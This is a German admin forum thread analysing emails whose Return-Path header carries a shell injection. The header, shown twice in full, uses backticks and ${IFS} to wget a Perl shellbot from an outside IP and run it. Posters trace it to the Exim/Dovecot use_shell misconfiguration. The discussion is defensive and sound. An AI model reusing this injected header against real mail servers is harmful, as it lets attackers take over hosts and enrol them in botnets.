Hallo zusammen,

ich hatte heute 3 seltsame E-Mail in meinem Account von root. Sie waren alle gleich. Ich kann mir keinen richtigen Reim darauf machen.

Ich betreibe einen Server bei 1und1. Habe die Debian Minimalinstallation genommen und einen Mailserver aufgesetzt. Es können nur authentifizierte User E-Mails versenden und auch nur von einer Domain.

Hier der Quellcode der Mail:

Code: Alles auswählenAufklappen

ATTFilter

Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>
Delivered-To: admin@********
Received: by ********.onlinehome-server.info (Postfix)
	id 142C5513; Wed, 19 Jun 2013 02:16:42 +0200 (CEST)
Delivered-To: root@localhost
Received: from domain.local (unknown [212.30.46.158])
	by ********.onlinehome-server.info (Postfix) with ESMTP id D394CE7
	for <root@localhost>; Wed, 19 Jun 2013 02:16:41 +0200 (CEST)
X-Antivirus: avast! (VPS 130618-0, 18.06.2013), Inbound message
X-Antivirus-Status: Clean

x
         

Wenn ich die Adresse hxxp://212.30.46.158/zax.pl in meinem Browser unter Windows eingebe, springt sofort der Virenscanner an und meldet "Perl:Shellbot-O [Trj]".

Grüße,
Andreas

wenn du an dieser Adresse eMails empfaengst, bekommst du auch welche

Es wird Milliarden an SPAM jede Stunde verschickt, oft auch einfach an standard Mail-Adressen wie admin@ info@ webmaster@ etc. pp.

Nichts ungewehnliches also.

Ok danke für die Information. Dann bin ich ja beruhigt.

Mit der Mail wird anscheindend irgendwie versucht ein externes Script zu starten, die Befehle stehen im Return-Path. Dadurch dachte ich gleich an eine Sicherheitslücke.

Das sehe ich auch so.
Es wird offensichtlich versucht ein Exploit auszunutzen umd den Server zu übernehmen.

Ich hab zu dem Script gegoogelt, aber nix gefunden.

Wäre interessant zu wissen, bei welchen Umständen dieser Exploit greift. Allerdings scheint das Script auch schon etwas älter zu sein. Habe mir mal die zax.pl Datei runtergeladen und im Header steht:

Code: Alles auswählenAufklappen

ATTFilter

#!/usr/bin/perl
####################################################
# Hawker Hunter v2.0 (ARZ Co. Ltd.) Legacy 2009(c) #
####################################################
         

Zitat:

Wäre interessant zu wissen, bei welchen Umständen dieser Exploit greift.

Wenn ich das richtig interpretiere, muss dieses Script auf der Konsole ausgeführt werden. Aber wer führt so ein Script schon freiwillig auf seinem Server aus?

Wenn ich mir deinen geposteten Link im Firefox anschaue, seh ich das Script selbst. Aber da wird nix ausgeführt

Hallo,

Das Thema hat mich jetzt hierher gebracht.

Also ich habe die gleiche E-Mail gestern erhalten. Auch hier hat mein Server mir diese E-Mail an meinen PLESK-Admin-Kontakt zugeschickt.

Allerdings wie? Mein Server ist 1 Monat alt und aktuell nur zum testen von PLESK 11.0.9#53. Ich habe zwar drei Domains eingerichtet, aber diese haben keinen Inhalt. Das Plesk-Panel selbst ist mit einer zusätzlichen htaccess geschützt und der Server hat nur Zugriff per "Private key file". Heißt jede andere Form der Anmeldung ist gesperrt. Auch der FTP ist deaktiviert.

Wieso habe ich also von meinem Server solch eine E-Mail erhalten?

Zitat:

Wieso habe ich also von meinem Server solch eine E-Mail erhalten?

Dein eigener Server hat diese Mail generiert, bist du dir da sicher?

Die E-Mail schaute so aus:

Zitat:

Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>
X-Original-To: MY-PLESK-EMAIL
Delivered-To: webXXXX@mail.webgo24-server13.de
X-Greylist: delayed 568 seconds by postgrey-1.32 at webgo24-server13.de; Wed, 19 Jun 2013 02:48:21 CEST
Received: from rsXXXXX.rs.hosteurope.de (rsXXXXX.rs.hosteurope.de [MY-SERVER-IP])
by mail.webgo24-server13.de (Postfix) with ESMTPS id D3F65304034A
for <MY-PLESK-EMAIL>; Wed, 19 Jun 2013 02:48:20 +0200 (CEST)
Received: by rsXXXXX.rs.hosteurope.de (Postfix)
id 2A2C860116; Wed, 19 Jun 2013 02:38:51 +0200 (CEST)
Delivered-To: root@localhost.localdomain
Received: by rsXXXXX.rs.hosteurope.de (Postfix)
id 28C3560117; Wed, 19 Jun 2013 02:38:51 +0200 (CEST)
Delivered-To: postmaster@localhost.rs.hosteurope.de
X-No-Auth: unauthenticated sender
X-No-Relay: not in my network
Received: from domain.local (unknown [212.30.46.158])
by rsXXXXX.rs.hosteurope.de (Postfix) with ESMTP id E637060116
for <postmaster@localhost>; Wed, 19 Jun 2013 02:38:50 +0200 (CEST)


x

Das sind meine Serverdaten:

Zitat:

Received: from rsXXXXX.rs.hosteurope.de (rsXXXXX.rs.hosteurope.de [MY-SERVER-IP])

Wo auch die E-Mail in Plesk als Admin hinterlegt ist. Die E-Mail selbst liegt bei webgo24, einem anderen Server.

Zitat:

Received: from domain.local (unknown [212.30.46.158])
by rsXXXXX.rs.hosteurope.de (Postfix) with ESMTP id E637060116

Hm, bedeutet das nicht, dass du die Mail von [212.30.46.158] bekommen hast? Also dein Server nur der Empfänger ist? Die Quelle ist übrigens die gleiche IP, auf dem dieses pl-Script über http verfügbar ist.

Zitat:

Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>

Hm, schau dir mal an was im Returnpath steht; darüber wird versucht per wget das pl-Script nach /tmp zu laden und dann auch zu starten....

Nachtrag: hiermal ein Artikel den ich gefunden habe => Vom Advisory zum Exploit binnen eines Tages - Aus dem Leben eines Szlauszafs

Zitat:

Am Freitag, dem dritten Mai, wurde ein Warnhinweis (Advisory) auf eine weit verbreitete Fehlkonfiguration in der Kombination von Exim mit Dovecot publiziert: ein offenbar seit 23.10.2009 im Dovecot-Wiki veröffentliches Konfigurationsbeispiel für Exim, mit dem eingehende E-Mails durch den zu Dovecot gehörenden LDA deliver ausgeliefert werden sollen, enthielt auch die Option “use_shell”, die dazu führt, dass der Aufruf insgesamt zur Ausführung an die Shell weitergegeben wird. Das is potentiell unsicher, wie auch die Exim-Dokumentation erläutert:

Wow! Danke schön! Zum Glück habe ich weder Exim, noch Dovecot. ^^°

Man hat mir erklärt und auch gezeigt dass derjenige wohl über telnet, einfach an "postmaster", gesendet hat, welches dann an meine Admin-Adresse weiterleitet. Danke, damit wäre das geklärt.

Zitat:

Wow! Danke schön! Zum Glück habe ich weder Exim, noch Dovecot. ^^°

Trotzdem immer die Augen offen halten und auf sichere/sinnvolle Konfig achten

Zitat:

Man hat mir erklärt und auch gezeigt dass derjenige wohl über telnet,

Dann stimmst du mir also zu, dass nicht dein Server die Mail generiert hat?
Diese Mail war "einfach" nur ein Versuch eine unsichere Konfig auszunutzen, hätte ich mir mal eher den returnpath angeschaut wäre ich auch eher drauf gekommen, ich kann mir kaum vorstellen, dass jmd so ein Shellscript absichtlich selbst ausführt

Der Script hat scheint was an einen IRC Server zu schicken.

Zitat:

Zitat von mort

Der Script hat scheint was an einen IRC Server zu schicken.

Wird ja auch als Shell-Bot klassifiziert